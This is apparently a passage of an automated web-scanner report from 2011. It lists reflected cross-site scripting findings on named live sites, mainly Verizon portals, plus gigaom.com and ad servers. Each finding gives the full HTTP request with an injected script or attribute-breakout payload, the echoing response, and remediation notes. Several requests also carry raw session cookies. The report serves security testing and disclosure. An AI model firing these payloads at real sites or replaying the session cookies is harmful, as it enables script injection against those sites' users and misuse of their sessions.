GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overviewcc2a1'-alert(1)-'be3f42647c0 HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 113542
Expires: Mon, 05 Sep 2011 22:36:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:36:03 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
earchFlow != null && searchFlow == "Shop")
           searchBox = $('#searchShopHeaderText'); //document.getElementById("searchShopHeaderText");    
       
       var f_pageDefLabel = 'SMBPortal_page_main_overviewcc2a1'-alert(1)-'be3f42647c0';
       if (f_pageDefLabel != "SMBPortal_page_SignIn")
           searchBox.focus();
   }
   
   onload = focusIt;
   // end WR 61703
   
</script>
...[SNIP]...

2.4. https://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 707d3(a)c76e008a5a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:34:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:34:45 GMT
Connection: close

Resource /SMBPortal707d3(a)c76e008a5a1/smb could not be resolved for locale null.

2.5. https://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   https://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a2adb(a)e545f998bfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/a2adb(a)e545f998bfa HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 78
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:34:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:34:46 GMT
Connection: close

Resource /SMBPortal/a2adb(a)e545f998bfa could not be resolved for locale null.

2.6. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Source%20Title parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VZCTC.serv

Issue detail

The value of the Source%20Title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3384e"%20a%3db%20da4ed1ab32f was submitted in the Source%20Title parameter. This input was echoed as 3384e" a=b da4ed1ab32f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In3384e"%20a%3db%20da4ed1ab32f&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:25:24 GMT
Content-length: 2589
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
   <HEAD>
       <title>Your automated customer
...[SNIP]...
<input name="sourceTitle" id="sourceTitle" type="hidden" value="Sign In3384e" a=b da4ed1ab32f"/>
...[SNIP]...

2.7. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Source%20URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VZCTC.serv

Issue detail

The value of the Source%20URL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 634ef"%20a%3db%208d0d9136ddf was submitted in the Source%20URL parameter. This input was echoed as 634ef" a=b 8d0d9136ddf in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23634ef"%20a%3db%208d0d9136ddf&lob=&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:25:49 GMT
Content-length: 2589
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
   <HEAD>
       <title>Your automated customer
...[SNIP]...
<input name="sourceURL" id="sourceURL" type="hidden" value="https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount#634ef" a=b 8d0d9136ddf"/>
...[SNIP]...

2.8. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [initQ parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VZCTC.serv

Issue detail

The value of the initQ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea847"%20a%3db%20c02826d64c0 was submitted in the initQ parameter. This input was echoed as ea847" a=b c02826d64c0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentialsea847"%20a%3db%20c02826d64c0 HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:26:41 GMT
Content-length: 2589
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
   <HEAD>
       <title>Your automated customer
...[SNIP]...
<input name="initQ" id="initQ" type="hidden" value="Forgot User Credentialsea847" a=b c02826d64c0"/>
...[SNIP]...

2.9. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [lob parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VZCTC.serv

Issue detail

The value of the lob request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3158"%20a%3db%20e7c5d162739 was submitted in the lob parameter. This input was echoed as e3158" a=b e7c5d162739 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=e3158"%20a%3db%20e7c5d162739&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:26:15 GMT
Content-length: 2589
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
   <HEAD>
       <title>Your automated customer
...[SNIP]...
<input name="param_141-7" id="param_141-7" type="hidden" value="e3158" a=b e7c5d162739" >
...[SNIP]...

2.10. http://gigaom.com/cloud/structure-50/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gigaom.com
Path:   /cloud/structure-50/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 22df2'><script>alert(1)</script>66c5427a585 was submitted in the REST URL parameter 2. This input was echoed as 22df2\'><script>alert(1)</script>66c5427a585 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cloud/structure-5022df2'><script>alert(1)</script>66c5427a585/ HTTP/1.1
Host: gigaom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 05 Sep 2011 22:36:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://gigaom.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 05 Sep 2011 22:36:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=60
Pragma: no-cache
Content-Length: 82351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Timer: [Init] 0.218 | 0.218 --><html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href='http://gigaom.com/cloud/structure-5022df2\'><script>alert(1)</script>66c5427a585/page/2/' class='go-page'>
...[SNIP]...

2.11. http://media.verizon.com/media/scripts/widget.ashx [container parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.verizon.com
Path:   /media/scripts/widget.ashx

Issue detail

The value of the container request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24165"%3balert(1)//19985c64c11 was submitted in the container parameter. This input was echoed as 24165";alert(1)//19985c64c11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/scripts/widget.ashx?widget=vzMedia&container=vzSliderWidget24165"%3balert(1)//19985c64c11 HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 79439
Date: Mon, 05 Sep 2011 22:42:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=KQfyhK9qeUc=&H=&I=&J=JxCF029RF/U=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:41 GMT; path=/media

/* widget.ashx code generated : 9/5/2011 10:41:41 PM; valid until: 9/5/2011 6:06:44 PM */
var vzWidgetsBaseURI = 'http://media.verizon.com/media',
vzWidgetsSignedIn = true;

/* files consolidated
...[SNIP]...
</script>\
       \
       ";
   jQuery("#vzSliderWidget24165";alert(1)//19985c64c11").html( ctrl );
});

2.12. http://media.verizon.com/media/scripts/widget.ashx [widget parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.verizon.com
Path:   /media/scripts/widget.ashx

Issue detail

The value of the widget request parameter is copied into the HTML document as plain text between tags. The payload 60a70<script>alert(1)</script>abb46e132b5 was submitted in the widget parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/scripts/widget.ashx?widget=vzMedia60a70<script>alert(1)</script>abb46e132b5&container=vzSliderWidget HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 253
Date: Mon, 05 Sep 2011 22:42:06 GMT
Connection: close
Vary: Accept-Encoding

/* could not complete request : System.Exception: No configuration is available for the requested widget (vzMedia60a70<script>alert(1)</script>abb46e132b5).
at WidgetHandler.get_Arguments()
at WidgetHandler.ProcessRequest(HttpContext context) */

2.13. http://r.turn.com/server/beacon_call.js [b2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/beacon_call.js

Issue detail

The value of the b2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28612"%3balert(1)//32b8a96ebbe was submitted in the b2 parameter. This input was echoed as 28612";alert(1)//32b8a96ebbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /server/beacon_call.js?b2=zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g28612"%3balert(1)//32b8a96ebbe HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Wed, 07 Sep 2011 22:14:40 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:14:40 GMT
Content-Length: 1572

(function() {
   function reset(w, doc) {
       var n=null;
       w.turn_beacon_data=n;
       w.turn_beacon_price=n;
       w.turn_beacon_url=n;
       w.turn_client_track_id=n;
       w.turn_beacon_referrer_url=n;
       w.turn_beaco
...[SNIP]...
nction setBeaconUrl(w, doc) {
                   w.turn_beacon_url = "http://r.turn.com/r/beacon?";
                           w.turn_beacon_data = "zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g28612";alert(1)//32b8a96ebbe";
           addBeaconUrlParam(w, "b2", w.turn_beacon_data);
               addBeaconUrlParam(w, "jsb", "1");
                   addBeaconUrlParam(w, "bprice", w.turn_beacon_price);
                           addBeaconUrlParam(w, "cid", w.turn_client_tr
...[SNIP]...

2.14. http://s.xp1.ru4.com/meta [ssv_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The value of the ssv_callback request parameter is copied into the HTML document as plain text between tags. The payload db97b<script>alert(1)</script>2c290befa45 was submitted in the ssv_callback parameter. This input was echoed unmodified in the application's response.

